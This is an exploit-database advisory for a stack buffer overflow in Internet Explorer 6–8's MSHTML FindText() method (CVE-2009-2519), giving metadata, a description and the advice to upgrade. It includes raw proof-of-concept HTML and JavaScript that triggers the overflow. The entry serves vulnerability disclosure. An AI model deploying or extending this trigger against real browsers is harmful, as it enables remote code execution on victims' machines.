Vendor: Internet Explorer
By: Moaub
CVSS: 9.3 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Internet Explorer
Affected Version From: 6.0
Affected Version To: 8.0
Patch Exists: YES
Related CVE: CVE-2009-2519
CPE: a:microsoft:internet_explorer
Platforms Tested: Windows
2009

Microsoft Internet Explorer MSHTML FindText Processing Issue

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the FindText() method of the MSHTML library. The issue lies in the improper validation of user-supplied data, which can result in a stack-based buffer overflow. An attacker can leverage this vulnerability to execute code in the context of the current process.

Mitigation:

Upgrade to version 8.0.6001.18702 or later.

Exploit-DB raw data:

<html>
<body>
<input type="button" value="Crachme!" onclick="Search()"/>
<input  type="text" value="Abysssec" id="Abysssec">&lt;/textarea&gt;

<script type="text/javascript">
function Search(){
var textinput  = document.getElementById("Abysssec");

var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
</script>
<p id="p">Abysssec</p>
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
</body>
</html>